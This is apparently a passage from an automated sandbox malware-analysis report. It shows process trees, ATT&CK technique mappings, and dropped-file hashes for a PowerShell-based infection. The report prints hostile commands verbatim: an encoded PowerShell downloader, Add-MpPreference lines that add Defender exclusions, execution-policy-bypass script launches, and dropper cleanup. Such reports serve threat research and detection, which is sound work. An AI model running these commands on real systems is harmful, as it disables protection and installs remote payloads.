      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABvAGIAVAB4AHEAIAA9ACAAKABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApACAAKwAgACcAZABsAGwAMAAxAC4AdAB4AHQAJwApACAAOwAkAHkAZgBrAHAAdAAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABvAGIAVAB4AHEAIAApACAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJAB5AGYAawBwAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAG8AYgBUAHgAcQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAA= -inputFormat xml -outputFormat text
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1276
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
      4⤵
      PID:3048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\\x11.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\\x22.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\cjksu.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4780
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs"
      4⤵
      PID:1176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\cjksu.ps1

Filesize
1.2MB

MD5
4cae4f09bfc221b0067fa2c7bfee0767

SHA1
ef5e5c14df21ccd2f07dbc7bae34d8a460cc7de3

SHA256
0e7e5c20ff5889875323abe6d7f0a8682b345ec94f29033320eddf3f491308bb

SHA512
faf0b9681306af119fb8c39e32fe4d3b693e80fe0d9120d9afd9e64f862e9e957bee9eee6feaf83cc57ab31bb7714fba61ffab8c65e5967d65fd220d4f81343a

Download Submit
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\x11.ps1

Filesize
402B

MD5
074bb1fafb328d28f18ae547a0973660

SHA1
76fba421cbdeea6bb7cfdae3b8f329049525d079

SHA256
01096c6bfe9c53d508208737df31fc1c720385cc1264bbc994a52b7112710fe5

SHA512
d1093531e65b922cd209edf0dbd50259ab599cd2c9fa5fac367f21d9a5ccd604ad505cfd6a2f08891d0387ad553d56581c24101c10bf7e6244ff2f072ee68187

Download Submit
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\x22.ps1

Filesize
406B

MD5
dfe11e6e84b1878dffad9c8e54a034b5

SHA1
3607403e2fdb576100da635d6f6360cd9612b6b0

SHA256
77151e8b6a0f623ee04518fd981db7e445b5e7fe619d7d82dffa879d7b79cd8b

SHA512
66a5e46cbf03cc433263b6c58497e073553da7a8cfd5345ede10a67b052b5122b0a9db0bb79d2f1b90822171f28a56f3210763fbfb95f4292e484e553fc5e109

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b138471334bb50e38b7fb5cb817e31b7

SHA1
bcdaeadb974f3caf0861c6b9a72f90951d51abf2

SHA256
4822a32741638f6766340d9f422f4cd1462f11db711e3afedae836a31e4d0d5d

SHA512
87c00a67e63aacebb55966ac4a7f9c54f90b808393ea01192df3b5e30b1f50e15d2f5e0714e60cb7cad1d9a412beae24ceb19efa10941a1d9dfc2d210d1aec03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
07ac9f95d8b16a198963d5b669eca2f8

SHA1
a45b28c4aced1de0eacaa54a38208bbe82f05d34

SHA256
9ba8a7edec1a92e26aa48ee62e00e49cfc4847cfcbe304a4099dc0dd0f3e5b05

SHA512
290b472719f9a1d2121c1a100ab811c15ca43bddb0d274c3da802e28baa13a513d8e3b8bf24a56a54aa057fc892de465c6e06a3020384aec51e09726012a1231

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
abc61a3ba469eac4fc74fc0440ae970d

SHA1
c87f49a9b96149161ee8ac965c4c817cc9593a0e

SHA256
1abd78d7c97794e384de9b89f590fadbf6304357a553331a3d333bca222ef068

SHA512
21ac44a68125bee45f9843370c941779a06c1201ddf55b88a39189f92c16e89de2a9c3cd022d2bccfc4a9a5e0745582df8eab5cb9aa3cde2d4c2e014f2589d9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8c8df45971b4c2a095c8d6ce9c8b0d85

SHA1
1922bce27f75c178dc8077a8f71702a3ba52ba0c

SHA256
10eb70af88e2872f17691786e51fdc748c7226032a0527a60ab6bf5d7a7aa82d

SHA512
5df91b5481de9c659fbfccdf338e34dfa7fa500e8501e9b49d7eca983bbe4802d2658bbb6e460ea4b0327fa3f289aa9e030ac7bd2fc7a299a62745e48c75149a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
721991167161c45d61b03e4dbad4984b

SHA1
fd3fa85d142b5e8d4906d3e5bfe10c5347958457

SHA256
0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb

SHA512
f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mus5avit.p4b.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
26B

MD5
d9a6eba20e1a05a18ca853659797ee53

SHA1
7577e5fcd39c3b13406e5af6447ba044a21565d3

SHA256
1596f1f33f95bf2ef8cc5033ee3ec619e07d2872d200eaede983671cc186a952

SHA512
9074b17efb3d6a4d63d7dd8994e4fe771d3019198876acab8e38c310213e2929e15413ab1dd2d1df6d2a73201424aae5aa0c812c5a4a8fe11ef176fdca039a6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
48KB

MD5
57e97e524dac6c5c3fb52d758ba7239a

SHA1
293f28458ad9a1d10d905fdc335a6c9f5d766c7f

SHA256
1f9c28385540f6470a57ae18bc4654f8f54e3436f0ed4e5723634b5841df21de

SHA512
1c6b77613742b7041a3b5f3c8b83a2c9cbd81525d8d5cdcedd5550e76f6c16f9fddcb52675974f0e6582baed5d65f79593a7cc8d959838bd3aee4c8dd86f133b

Download Submit
memory/3604-34-0x00007FFF8AD90000-0x00007FFF8B851000-memory.dmp

Filesize
10.8MB

Download
memory/3604-33-0x00007FFF8AD93000-0x00007FFF8AD95000-memory.dmp

Filesize
8KB

Download
memory/3604-11-0x00007FFF8AD90000-0x00007FFF8B851000-memory.dmp

Filesize
10.8MB

Download
memory/3604-0-0x00007FFF8AD93000-0x00007FFF8AD95000-memory.dmp

Filesize
8KB

Download
memory/3604-12-0x00007FFF8AD90000-0x00007FFF8B851000-memory.dmp

Filesize
10.8MB

Download
memory/3604-96-0x00007FFF8AD90000-0x00007FFF8B851000-memory.dmp

Filesize
10.8MB

Download
memory/3604-1-0x00000270FDEB0000-0x00000270FDED2000-memory.dmp

Filesize
136KB

Download
memory/4028-39-0x0000020DEDB20000-0x0000020DEDB2A000-memory.dmp

Filesize
40KB

Download
memory/4780-108-0x000002DF42E40000-0x000002DF42E4A000-memory.dmp

Filesize
40KB

Download